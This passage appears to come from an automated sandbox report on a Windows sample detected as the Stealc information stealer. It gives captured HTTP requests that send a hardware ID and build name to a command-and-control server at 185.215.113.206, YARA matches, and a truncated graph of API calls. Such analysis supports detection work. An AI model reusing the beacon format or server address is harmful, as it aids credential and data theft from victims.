                                         Oct 26, 2024 07:11:00.357438087 CEST | 90 | OUT | GET / HTTP/1.1
                                         Host: 185.215.113.206
                                         Connection: Keep-Alive
                                         Cache-Control: no-cache
                                         Oct 26, 2024 07:11:01.327523947 CEST | 203 | IN | HTTP/1.1 200 OK
                                         Date: Sat, 26 Oct 2024 05:11:01 GMT
                                         Server: Apache/2.4.52 (Ubuntu)
                                         Content-Length: 0
                                         Keep-Alive: timeout=5, max=100
                                         Connection: Keep-Alive
                                         Content-Type: text/html; charset=UTF-8
                                         Oct 26, 2024 07:11:01.331181049 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                                         Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI
                                         Host: 185.215.113.206
                                         Content-Length: 210
                                         Connection: Keep-Alive
                                         Cache-Control: no-cache
                                         Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 38 45 38 41 41 38 34 45 41 35 42 33 34 30 37 37 39 30 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a
                                         Data Ascii:
                                         ------DGHJECAFIDAFHJKFCGHI
                                         Content-Disposition: form-data; name="hwid"
                                         
                                         C8E8AA84EA5B340779059
                                         ------DGHJECAFIDAFHJKFCGHI
                                         Content-Disposition: form-data; name="build"
                                         
                                         puma
                                         ------DGHJECAFIDAFHJKFCGHI--
                                         Oct 26, 2024 07:11:01.630204916 CEST | 210 | IN | HTTP/1.1 200 OK
                                         Date: Sat, 26 Oct 2024 05:11:01 GMT
                                         Server: Apache/2.4.52 (Ubuntu)
                                         Content-Length: 8
                                         Keep-Alive: timeout=5, max=99
                                         Connection: Keep-Alive
                                         Content-Type: text/html; charset=UTF-8
                                         Data Raw: 59 6d 78 76 59 32 73 3d
                                         Data Ascii: YmxvY2s=

                                        Target ID:0
                                        Start time:01:10:56
                                        Start date:26/10/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0xe90000
                                        File size:1'830'912 bytes
                                        MD5 hash:23F03176DDC56B4E531545AAF7394334
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2175832040.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2135381078.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:7.5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:10.1%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:24
API calls 14444->14445 14446 e941f3 14445->14446 14447 e945c0 2 API calls 14446->14447 14448 e9420c 14447->14448 14449 e945c0 2 API calls 14448->14449 14450 e94225 14449->14450 14451 e945c0 2 API calls 14450->14451 14452 e9423e 14451->14452 14453 e945c0 2 API calls 14452->14453 14454 e94257 14453->14454 14455 e945c0 2 API calls 14454->14455 14456 e94270 14455->14456 14457 e945c0 2 API calls 14456->14457 14458 e94289 14457->14458 14459 e945c0 2 API calls 14458->14459 14460 e942a2 14459->14460 14461 e945c0 2 API calls 14460->14461 14462 e942bb 14461->14462 14463 e945c0 2 API calls 14462->14463 14464 e942d4 14463->14464 14465 e945c0 2 API calls 14464->14465 14466 e942ed 14465->14466 14467 e945c0 2 API calls 14466->14467 14468 e94306 14467->14468 14469 e945c0 2 API calls 14468->14469 14470 e9431f 14469->14470 14471 e945c0 2 API calls 14470->14471 14472 e94338 14471->14472 14473 e945c0 2 API calls 14472->14473 14474 e94351 14473->14474 14475 e945c0 2 API calls 14474->14475 14476 e9436a 14475->14476 14477 e945c0 2 API calls 14476->14477 14478 e94383 14477->14478 14479 e945c0 2 API calls 14478->14479 14480 e9439c 14479->14480 14481 e945c0 2 API calls 14480->14481 14482 e943b5 14481->14482 14483 e945c0 2 API calls 14482->14483 14484 e943ce 14483->14484 14485 e945c0 2 API calls 14484->14485 14486 e943e7 14485->14486 14487 e945c0 2 API calls 14486->14487 14488 e94400 14487->14488 14489 e945c0 2 API calls 14488->14489 14490 e94419 14489->14490 14491 e945c0 2 API calls 14490->14491 14492 e94432 14491->14492 14493 e945c0 2 API calls 14492->14493 14494 e9444b 14493->14494 14495 e945c0 2 API calls 14494->14495 14496 e94464 14495->14496 14497 e945c0 2 API calls 14496->14497 14498 e9447d 14497->14498 14499 e945c0 2 API calls 14498->14499 14500 e94496 14499->14500 14501 e945c0 2 API calls 14500->14501 14502 e944af 14501->14502 14503 e945c0 2 API calls 14502->14503 14504 e944c8 14503->14504 14505 e945c0 2 API calls 14504->14505 14506 e944e1 14505->14506 14507 e945c0 2 API calls 
14506->14507 14508 e944fa 14507->14508 14509 e945c0 2 API calls 14508->14509 14510 e94513 14509->14510 14511 e945c0 2 API calls 14510->14511 14512 e9452c 14511->14512 14513 e945c0 2 API calls 14512->14513 14514 e94545 14513->14514 14515 e945c0 2 API calls 14514->14515 14516 e9455e 14515->14516 14517 e945c0 2 API calls 14516->14517 14518 e94577 14517->14518 14519 e945c0 2 API calls 14518->14519 14520 e94590 14519->14520 14521 e945c0 2 API calls 14520->14521 14522 e945a9 14521->14522 14523 ea9c10 14522->14523 14524 ea9c20 43 API calls 14523->14524 14525 eaa036 8 API calls 14523->14525 14524->14525 14526 eaa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14525->14526 14527 eaa146 14525->14527 14526->14527 14528 eaa153 8 API calls 14527->14528 14529 eaa216 14527->14529 14528->14529 14530 eaa298 14529->14530 14531 eaa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14529->14531 14532 eaa337 14530->14532 14533 eaa2a5 6 API calls 14530->14533 14531->14530 14534 eaa41f 14532->14534 14535 eaa344 9 API calls 14532->14535 14533->14532 14536 eaa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14534->14536 14537 eaa4a2 14534->14537 14535->14534 14536->14537 14538 eaa4ab GetProcAddress GetProcAddress 14537->14538 14539 eaa4dc 14537->14539 14538->14539 14540 eaa515 14539->14540 14541 eaa4e5 GetProcAddress GetProcAddress 14539->14541 14542 eaa612 14540->14542 14543 eaa522 10 API calls 14540->14543 14541->14540 14544 eaa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14544 14545 eaa67d 14542->14545 14543->14542 14544->14545 14546 eaa69e 14545->14546 14547 eaa686 GetProcAddress 14545->14547 14548 ea5ca3 14546->14548 14549 eaa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14546->14549 14547->14546 14550 e91590 14548->14550 14549->14548 15671 e91670 14550->15671 14553 eaa7a0 lstrcpy 14554 e915b5 14553->14554 14555 eaa7a0 lstrcpy 14554->14555 14556 e915c7 
14555->14556 14557 eaa7a0 lstrcpy 14556->14557 14558 e915d9 14557->14558 14559 eaa7a0 lstrcpy 14558->14559 14560 e91663 14559->14560 14561 ea5510 14560->14561 14562 ea5521 14561->14562 14563 eaa820 2 API calls 14562->14563 14564 ea552e 14563->14564 14565 eaa820 2 API calls 14564->14565 14566 ea553b 14565->14566 14567 eaa820 2 API calls 14566->14567 14568 ea5548 14567->14568 14569 eaa740 lstrcpy 14568->14569 14570 ea5555 14569->14570 14571 eaa740 lstrcpy 14570->14571 14572 ea5562 14571->14572 14573 eaa740 lstrcpy 14572->14573 14574 ea556f 14573->14574 14575 eaa740 lstrcpy 14574->14575 14615 ea557c 14575->14615 14576 eaa740 lstrcpy 14576->14615 14577 eaa820 lstrlen lstrcpy 14577->14615 14578 ea5643 StrCmpCA 14578->14615 14579 ea56a0 StrCmpCA 14580 ea57dc 14579->14580 14579->14615 14582 eaa8a0 lstrcpy 14580->14582 14581 eaa7a0 lstrcpy 14581->14615 14583 ea57e8 14582->14583 14584 eaa820 2 API calls 14583->14584 14585 ea57f6 14584->14585 14587 eaa820 2 API calls 14585->14587 14586 ea5856 StrCmpCA 14588 ea5991 14586->14588 14586->14615 14590 ea5805 14587->14590 14589 eaa8a0 lstrcpy 14588->14589 14591 ea599d 14589->14591 14592 e91670 lstrcpy 14590->14592 14593 eaa820 2 API calls 14591->14593 14611 ea5811 14592->14611 14595 ea59ab 14593->14595 14594 ea51f0 20 API calls 14594->14615 14598 eaa820 2 API calls 14595->14598 14596 ea5a0b StrCmpCA 14599 ea5a28 14596->14599 14600 ea5a16 Sleep 14596->14600 14597 ea52c0 25 API calls 14597->14615 14601 ea59ba 14598->14601 14602 eaa8a0 lstrcpy 14599->14602 14600->14615 14603 e91670 lstrcpy 14601->14603 14604 ea5a34 14602->14604 14603->14611 14605 eaa820 2 API calls 14604->14605 14606 ea5a43 14605->14606 14607 eaa820 2 API calls 14606->14607 14608 ea5a52 14607->14608 14610 e91670 lstrcpy 14608->14610 14609 ea578a StrCmpCA 14609->14615 14610->14611 14611->13668 14612 ea593f StrCmpCA 14612->14615 14613 eaa8a0 lstrcpy 14613->14615 14614 e91590 lstrcpy 14614->14615 14615->14576 14615->14577 14615->14578 14615->14579 14615->14581 
14615->14586 14615->14594 14615->14596 14615->14597 14615->14609 14615->14612 14615->14613 14615->14614 14617 ea754c 14616->14617 14618 ea7553 GetVolumeInformationA 14616->14618 14617->14618 14619 ea7591 14618->14619 14620 ea75fc GetProcessHeap RtlAllocateHeap 14619->14620 14621 ea7628 wsprintfA 14620->14621 14622 ea7619 14620->14622 14624 eaa740 lstrcpy 14621->14624 14623 eaa740 lstrcpy 14622->14623 14625 ea5da7 14623->14625 14624->14625 14625->13689 14627 eaa7a0 lstrcpy 14626->14627 14628 e94899 14627->14628 15680 e947b0 14628->15680 14630 e948a5 14631 eaa740 lstrcpy 14630->14631 14632 e948d7 14631->14632 14633 eaa740 lstrcpy 14632->14633 14634 e948e4 14633->14634 14635 eaa740 lstrcpy 14634->14635 14636 e948f1 14635->14636 14637 eaa740 lstrcpy 14636->14637 14638 e948fe 14637->14638 14639 eaa740 lstrcpy 14638->14639 14640 e9490b InternetOpenA StrCmpCA 14639->14640 14641 e94944 14640->14641 14642 e94ecb InternetCloseHandle 14641->14642 15686 ea8b60 14641->15686 14643 e94ee8 14642->14643 15701 e99ac0 CryptStringToBinaryA 14643->15701 14645 e94963 15694 eaa920 14645->15694 14648 e94976 14650 eaa8a0 lstrcpy 14648->14650 14655 e9497f 14650->14655 14651 eaa820 2 API calls 14652 e94f05 14651->14652 14653 eaa9b0 4 API calls 14652->14653 14656 e94f1b 14653->14656 14654 e94f27 codecvt 14657 eaa7a0 lstrcpy 14654->14657 14659 eaa9b0 4 API calls 14655->14659 14658 eaa8a0 lstrcpy 14656->14658 14668 e94f57 14657->14668 14658->14654 14660 e949a9 14659->14660 14661 eaa8a0 lstrcpy 14660->14661 14662 e949b2 14661->14662 14663 eaa9b0 4 API calls 14662->14663 14664 e949d1 14663->14664 14665 eaa8a0 lstrcpy 14664->14665 14666 e949da 14665->14666 14667 eaa920 3 API calls 14666->14667 14669 e949f8 14667->14669 14668->13692 14670 eaa8a0 lstrcpy 14669->14670 14671 e94a01 14670->14671 14672 eaa9b0 4 API calls 14671->14672 14673 e94a20 14672->14673 14674 eaa8a0 lstrcpy 14673->14674 14675 e94a29 14674->14675 14676 eaa9b0 4 API calls 14675->14676 14677 e94a48 14676->14677 14678 eaa8a0 lstrcpy 
14677->14678 14679 e94a51 14678->14679 14680 eaa9b0 4 API calls 14679->14680 14681 e94a7d 14680->14681 14682 eaa920 3 API calls 14681->14682 14683 e94a84 14682->14683 14684 eaa8a0 lstrcpy 14683->14684 14685 e94a8d 14684->14685 14686 e94aa3 InternetConnectA 14685->14686 14686->14642 14687 e94ad3 HttpOpenRequestA 14686->14687 14689 e94b28 14687->14689 14690 e94ebe InternetCloseHandle 14687->14690 14691 eaa9b0 4 API calls 14689->14691 14690->14642 14692 e94b3c 14691->14692 14693 eaa8a0 lstrcpy 14692->14693 14694 e94b45 14693->14694 14695 eaa920 3 API calls 14694->14695 14696 e94b63 14695->14696 14697 eaa8a0 lstrcpy 14696->14697 14698 e94b6c 14697->14698 14699 eaa9b0 4 API calls 14698->14699 14700 e94b8b 14699->14700 14701 eaa8a0 lstrcpy 14700->14701 14702 e94b94 14701->14702 14703 eaa9b0 4 API calls 14702->14703 14704 e94bb5 14703->14704 14705 eaa8a0 lstrcpy 14704->14705 14706 e94bbe 14705->14706 14707 eaa9b0 4 API calls 14706->14707 14708 e94bde 14707->14708 14709 eaa8a0 lstrcpy 14708->14709 14710 e94be7 14709->14710 14711 eaa9b0 4 API calls 14710->14711 14712 e94c06 14711->14712 14713 eaa8a0 lstrcpy 14712->14713 14714 e94c0f 14713->14714 14715 eaa920 3 API calls 14714->14715 14716 e94c2d 14715->14716 14717 eaa8a0 lstrcpy 14716->14717 14718 e94c36 14717->14718 14719 eaa9b0 4 API calls 14718->14719 14720 e94c55 14719->14720 14721 eaa8a0 lstrcpy 14720->14721 14722 e94c5e 14721->14722 14723 eaa9b0 4 API calls 14722->14723 14724 e94c7d 14723->14724 14725 eaa8a0 lstrcpy 14724->14725 14726 e94c86 14725->14726 14727 eaa920 3 API calls 14726->14727 14728 e94ca4 14727->14728 14729 eaa8a0 lstrcpy 14728->14729 14730 e94cad 14729->14730 14731 eaa9b0 4 API calls 14730->14731 14732 e94ccc 14731->14732 14733 eaa8a0 lstrcpy 14732->14733 14734 e94cd5 14733->14734 14735 eaa9b0 4 API calls 14734->14735 14736 e94cf6 14735->14736 14737 eaa8a0 lstrcpy 14736->14737 14738 e94cff 14737->14738 14739 eaa9b0 4 API calls 14738->14739 14740 e94d1f 14739->14740 14741 eaa8a0 lstrcpy 14740->14741 
14742 e94d28 14741->14742 14743 eaa9b0 4 API calls 14742->14743 14744 e94d47 14743->14744 14745 eaa8a0 lstrcpy 14744->14745 14746 e94d50 14745->14746 14747 eaa920 3 API calls 14746->14747 14748 e94d6e 14747->14748 14749 eaa8a0 lstrcpy 14748->14749 14750 e94d77 14749->14750 14751 eaa740 lstrcpy 14750->14751 14752 e94d92 14751->14752 14753 eaa920 3 API calls 14752->14753 14754 e94db3 14753->14754 14755 eaa920 3 API calls 14754->14755 14756 e94dba 14755->14756 14757 eaa8a0 lstrcpy 14756->14757 14758 e94dc6 14757->14758 14759 e94de7 lstrlen 14758->14759 14760 e94dfa 14759->14760 14761 e94e03 lstrlen 14760->14761 15700 eaaad0 14761->15700 14763 e94e13 HttpSendRequestA 14764 e94e32 InternetReadFile 14763->14764 14765 e94e67 InternetCloseHandle 14764->14765 14770 e94e5e 14764->14770 14768 eaa800 14765->14768 14767 eaa9b0 4 API calls 14767->14770 14768->14690 14769 eaa8a0 lstrcpy 14769->14770 14770->14764 14770->14765 14770->14767 14770->14769 15707 eaaad0 14771->15707 14773 ea17c4 StrCmpCA 14774 ea17cf ExitProcess 14773->14774 14776 ea17d7 14773->14776 14775 ea19c2 14775->13694 14776->14775 14777 ea18cf StrCmpCA 14776->14777 14778 ea18ad StrCmpCA 14776->14778 14779 ea187f StrCmpCA 14776->14779 14780 ea185d StrCmpCA 14776->14780 14781 ea1932 StrCmpCA 14776->14781 14782 ea1913 StrCmpCA 14776->14782 14783 ea1970 StrCmpCA 14776->14783 14784 ea18f1 StrCmpCA 14776->14784 14785 ea1951 StrCmpCA 14776->14785 14786 eaa820 lstrlen lstrcpy 14776->14786 14777->14776 14778->14776 14779->14776 14780->14776 14781->14776 14782->14776 14783->14776 14784->14776 14785->14776 14786->14776 14788 eaa7a0 lstrcpy 14787->14788 14789 e95979 14788->14789 14790 e947b0 2 API calls 14789->14790 14791 e95985 14790->14791 14792 eaa740 lstrcpy 14791->14792 14793 e959ba 14792->14793 14794 eaa740 lstrcpy 14793->14794 14795 e959c7 14794->14795 14796 eaa740 lstrcpy 14795->14796 14797 e959d4 14796->14797 14798 eaa740 lstrcpy 14797->14798 14799 e959e1 14798->14799 14800 eaa740 lstrcpy 14799->14800 14801 e959ee 
InternetOpenA StrCmpCA 14800->14801 14802 e95a1d 14801->14802 14803 e95fc3 InternetCloseHandle 14802->14803 14804 ea8b60 3 API calls 14802->14804 14805 e95fe0 14803->14805 14806 e95a3c 14804->14806 14808 e99ac0 4 API calls 14805->14808 14807 eaa920 3 API calls 14806->14807 14810 e95a4f 14807->14810 14809 e95fe6 14808->14809 14812 eaa820 2 API calls 14809->14812 14815 e9601f codecvt 14809->14815 14811 eaa8a0 lstrcpy 14810->14811 14816 e95a58 14811->14816 14813 e95ffd 14812->14813 14814 eaa9b0 4 API calls 14813->14814 14817 e96013 14814->14817 14819 eaa7a0 lstrcpy 14815->14819 14820 eaa9b0 4 API calls 14816->14820 14818 eaa8a0 lstrcpy 14817->14818 14818->14815 14828 e9604f 14819->14828 14821 e95a82 14820->14821 14822 eaa8a0 lstrcpy 14821->14822 14823 e95a8b 14822->14823 14824 eaa9b0 4 API calls 14823->14824 14825 e95aaa 14824->14825 14826 eaa8a0 lstrcpy 14825->14826 14827 e95ab3 14826->14827 14829 eaa920 3 API calls 14827->14829 14828->13700 14830 e95ad1 14829->14830 14831 eaa8a0 lstrcpy 14830->14831 14832 e95ada 14831->14832 14833 eaa9b0 4 API calls 14832->14833 14834 e95af9 14833->14834 14835 eaa8a0 lstrcpy 14834->14835 14836 e95b02 14835->14836 14837 eaa9b0 4 API calls 14836->14837 14838 e95b21 14837->14838 14839 eaa8a0 lstrcpy 14838->14839 14840 e95b2a 14839->14840 14841 eaa9b0 4 API calls 14840->14841 14842 e95b56 14841->14842 14843 eaa920 3 API calls 14842->14843 14844 e95b5d 14843->14844 14845 eaa8a0 lstrcpy 14844->14845 14846 e95b66 14845->14846 14847 e95b7c InternetConnectA 14846->14847 14847->14803 14848 e95bac HttpOpenRequestA 14847->14848 14850 e95c0b 14848->14850 14851 e95fb6 InternetCloseHandle 14848->14851 14852 eaa9b0 4 API calls 14850->14852 14851->14803 14853 e95c1f 14852->14853 14854 eaa8a0 lstrcpy 14853->14854 14855 e95c28 14854->14855 14856 eaa920 3 API calls 14855->14856 14857 e95c46 14856->14857 14858 eaa8a0 lstrcpy 14857->14858 14859 e95c4f 14858->14859 14860 eaa9b0 4 API calls 14859->14860 14861 e95c6e 14860->14861 14862 eaa8a0 lstrcpy 
14861->14862 14863 e95c77 14862->14863 14864 eaa9b0 4 API calls 14863->14864 14865 e95c98 14864->14865 14866 eaa8a0 lstrcpy 14865->14866 14867 e95ca1 14866->14867 14868 eaa9b0 4 API calls 14867->14868 14869 e95cc1 14868->14869 14870 eaa8a0 lstrcpy 14869->14870 14871 e95cca 14870->14871 14872 eaa9b0 4 API calls 14871->14872 14873 e95ce9 14872->14873 14874 eaa8a0 lstrcpy 14873->14874 14875 e95cf2 14874->14875 14876 eaa920 3 API calls 14875->14876 14877 e95d10 14876->14877 14878 eaa8a0 lstrcpy 14877->14878 14879 e95d19 14878->14879 14880 eaa9b0 4 API calls 14879->14880 14881 e95d38 14880->14881 14882 eaa8a0 lstrcpy 14881->14882 14883 e95d41 14882->14883 14884 eaa9b0 4 API calls 14883->14884 14885 e95d60 14884->14885 14886 eaa8a0 lstrcpy 14885->14886 14887 e95d69 14886->14887 14888 eaa920 3 API calls 14887->14888 14889 e95d87 14888->14889 14890 eaa8a0 lstrcpy 14889->14890 14891 e95d90 14890->14891 14892 eaa9b0 4 API calls 14891->14892 14893 e95daf 14892->14893 14894 eaa8a0 lstrcpy 14893->14894 14895 e95db8 14894->14895 14896 eaa9b0 4 API calls 14895->14896 14897 e95dd9 14896->14897 14898 eaa8a0 lstrcpy 14897->14898 14899 e95de2 14898->14899 14900 eaa9b0 4 API calls 14899->14900 14901 e95e02 14900->14901 14902 eaa8a0 lstrcpy 14901->14902 14903 e95e0b 14902->14903 14904 eaa9b0 4 API calls 14903->14904 14905 e95e2a 14904->14905 14906 eaa8a0 lstrcpy 14905->14906 14907 e95e33 14906->14907 14908 eaa920 3 API calls 14907->14908 14909 e95e54 14908->14909 14910 eaa8a0 lstrcpy 14909->14910 14911 e95e5d 14910->14911 14912 e95e70 lstrlen 14911->14912 15708 eaaad0 14912->15708 14914 e95e81 lstrlen GetProcessHeap RtlAllocateHeap 15709 eaaad0 14914->15709 14916 e95eae lstrlen 14917 e95ebe 14916->14917 14918 e95ed7 lstrlen 14917->14918 14919 e95ee7 14918->14919 14920 e95ef0 lstrlen 14919->14920 14921 e95f04 14920->14921 14922 e95f1a lstrlen 14921->14922 15710 eaaad0 14922->15710 14924 e95f2a HttpSendRequestA 14925 e95f35 InternetReadFile 14924->14925 14926 e95f6a InternetCloseHandle 
14925->14926 14930 e95f61 14925->14930 14926->14851 14928 eaa9b0 4 API calls 14928->14930 14929 eaa8a0 lstrcpy 14929->14930 14930->14925 14930->14926 14930->14928 14930->14929 14933 ea1077 14931->14933 14932 ea1151 14932->13702 14933->14932 14934 eaa820 lstrlen lstrcpy 14933->14934 14934->14933 14937 ea0db7 14935->14937 14936 ea0f17 14936->13710 14937->14936 14938 ea0e27 StrCmpCA 14937->14938 14939 ea0e67 StrCmpCA 14937->14939 14940 ea0ea4 StrCmpCA 14937->14940 14941 eaa820 lstrlen lstrcpy 14937->14941 14938->14937 14939->14937 14940->14937 14941->14937 14946 ea0f67 14942->14946 14943 ea1044 14943->13718 14944 ea0fb2 StrCmpCA 14944->14946 14945 eaa820 lstrlen lstrcpy 14945->14946 14946->14943 14946->14944 14946->14945 14948 eaa740 lstrcpy 14947->14948 14949 ea1a26 14948->14949 14950 eaa9b0 4 API calls 14949->14950 14951 ea1a37 14950->14951 14952 eaa8a0 lstrcpy 14951->14952 14953 ea1a40 14952->14953 14954 eaa9b0 4 API calls 14953->14954 14955 ea1a5b 14954->14955 14956 eaa8a0 lstrcpy 14955->14956 14957 ea1a64 14956->14957 14958 eaa9b0 4 API calls 14957->14958 14959 ea1a7d 14958->14959 14960 eaa8a0 lstrcpy 14959->14960 14961 ea1a86 14960->14961 14962 eaa9b0 4 API calls 14961->14962 14963 ea1aa1 14962->14963 14964 eaa8a0 lstrcpy 14963->14964 14965 ea1aaa 14964->14965 14966 eaa9b0 4 API calls 14965->14966 14967 ea1ac3 14966->14967 14968 eaa8a0 lstrcpy 14967->14968 14969 ea1acc 14968->14969 14970 eaa9b0 4 API calls 14969->14970 14971 ea1ae7 14970->14971 14972 eaa8a0 lstrcpy 14971->14972 14973 ea1af0 14972->14973 14974 eaa9b0 4 API calls 14973->14974 14975 ea1b09 14974->14975 14976 eaa8a0 lstrcpy 14975->14976 14977 ea1b12 14976->14977 14978 eaa9b0 4 API calls 14977->14978 14979 ea1b2d 14978->14979 14980 eaa8a0 lstrcpy 14979->14980 14981 ea1b36 14980->14981 14982 eaa9b0 4 API calls 14981->14982 14983 ea1b4f 14982->14983 14984 eaa8a0 lstrcpy 14983->14984 14985 ea1b58 14984->14985 14986 eaa9b0 4 API calls 14985->14986 14987 ea1b76 14986->14987 14988 eaa8a0 lstrcpy 
14987->14988 14989 ea1b7f 14988->14989 14990 ea7500 6 API calls 14989->14990 14991 ea1b96 14990->14991 14992 eaa920 3 API calls 14991->14992 14993 ea1ba9 14992->14993 14994 eaa8a0 lstrcpy 14993->14994 14995 ea1bb2 14994->14995 14996 eaa9b0 4 API calls 14995->14996 14997 ea1bdc 14996->14997 14998 eaa8a0 lstrcpy 14997->14998 14999 ea1be5 14998->14999 15000 eaa9b0 4 API calls 14999->15000 15001 ea1c05 15000->15001 15002 eaa8a0 lstrcpy 15001->15002 15003 ea1c0e 15002->15003 15711 ea7690 GetProcessHeap RtlAllocateHeap 15003->15711 15006 eaa9b0 4 API calls 15007 ea1c2e 15006->15007 15008 eaa8a0 lstrcpy 15007->15008 15009 ea1c37 15008->15009 15010 eaa9b0 4 API calls 15009->15010 15011 ea1c56 15010->15011 15012 eaa8a0 lstrcpy 15011->15012 15013 ea1c5f 15012->15013 15014 eaa9b0 4 API calls 15013->15014 15015 ea1c80 15014->15015 15016 eaa8a0 lstrcpy 15015->15016 15017 ea1c89 15016->15017 15718 ea77c0 GetCurrentProcess IsWow64Process 15017->15718 15020 eaa9b0 4 API calls 15021 ea1ca9 15020->15021 15022 eaa8a0 lstrcpy 15021->15022 15023 ea1cb2 15022->15023 15024 eaa9b0 4 API calls 15023->15024 15025 ea1cd1 15024->15025 15026 eaa8a0 lstrcpy 15025->15026 15027 ea1cda 15026->15027 15028 eaa9b0 4 API calls 15027->15028 15029 ea1cfb 15028->15029 15030 eaa8a0 lstrcpy 15029->15030 15031 ea1d04 15030->15031 15032 ea7850 3 API calls 15031->15032 15033 ea1d14 15032->15033 15034 eaa9b0 4 API calls 15033->15034 15035 ea1d24 15034->15035 15036 eaa8a0 lstrcpy 15035->15036 15037 ea1d2d 15036->15037 15038 eaa9b0 4 API calls 15037->15038 15039 ea1d4c 15038->15039 15040 eaa8a0 lstrcpy 15039->15040 15041 ea1d55 15040->15041 15042 eaa9b0 4 API calls 15041->15042 15043 ea1d75 15042->15043 15044 eaa8a0 lstrcpy 15043->15044 15045 ea1d7e 15044->15045 15046 ea78e0 3 API calls 15045->15046 15047 ea1d8e 15046->15047 15048 eaa9b0 4 API calls 15047->15048 15049 ea1d9e 15048->15049 15050 eaa8a0 lstrcpy 15049->15050 15051 ea1da7 15050->15051 15052 eaa9b0 4 API calls 15051->15052 15053 ea1dc6 15052->15053 
15054 eaa8a0 lstrcpy 15053->15054 15055 ea1dcf 15054->15055 15056 eaa9b0 4 API calls 15055->15056 15057 ea1df0 15056->15057 15058 eaa8a0 lstrcpy 15057->15058 15059 ea1df9 15058->15059 15720 ea7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15059->15720 15062 eaa9b0 4 API calls 15063 ea1e19 15062->15063 15064 eaa8a0 lstrcpy 15063->15064 15065 ea1e22 15064->15065 15066 eaa9b0 4 API calls 15065->15066 15067 ea1e41 15066->15067 15068 eaa8a0 lstrcpy 15067->15068 15069 ea1e4a 15068->15069 15070 eaa9b0 4 API calls 15069->15070 15071 ea1e6b 15070->15071 15072 eaa8a0 lstrcpy 15071->15072 15073 ea1e74 15072->15073 15722 ea7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15073->15722 15076 eaa9b0 4 API calls 15077 ea1e94 15076->15077 15078 eaa8a0 lstrcpy 15077->15078 15079 ea1e9d 15078->15079 15080 eaa9b0 4 API calls 15079->15080 15081 ea1ebc 15080->15081 15082 eaa8a0 lstrcpy 15081->15082 15083 ea1ec5 15082->15083 15084 eaa9b0 4 API calls 15083->15084 15085 ea1ee5 15084->15085 15086 eaa8a0 lstrcpy 15085->15086 15087 ea1eee 15086->15087 15725 ea7b00 GetUserDefaultLocaleName 15087->15725 15090 eaa9b0 4 API calls 15091 ea1f0e 15090->15091 15092 eaa8a0 lstrcpy 15091->15092 15093 ea1f17 15092->15093 15094 eaa9b0 4 API calls 15093->15094 15095 ea1f36 15094->15095 15096 eaa8a0 lstrcpy 15095->15096 15097 ea1f3f 15096->15097 15098 eaa9b0 4 API calls 15097->15098 15099 ea1f60 15098->15099 15100 eaa8a0 lstrcpy 15099->15100 15101 ea1f69 15100->15101 15729 ea7b90 15101->15729 15103 ea1f80 15104 eaa920 3 API calls 15103->15104 15105 ea1f93 15104->15105 15106 eaa8a0 lstrcpy 15105->15106 15107 ea1f9c 15106->15107 15108 eaa9b0 4 API calls 15107->15108 15109 ea1fc6 15108->15109 15110 eaa8a0 lstrcpy 15109->15110 15111 ea1fcf 15110->15111 15112 eaa9b0 4 API calls 15111->15112 15113 ea1fef 15112->15113 15114 eaa8a0 lstrcpy 15113->15114 15115 ea1ff8 15114->15115 15741 ea7d80 GetSystemPowerStatus 15115->15741 15118 eaa9b0 4 API calls 15119 ea2018 15118->15119 15120 eaa8a0 
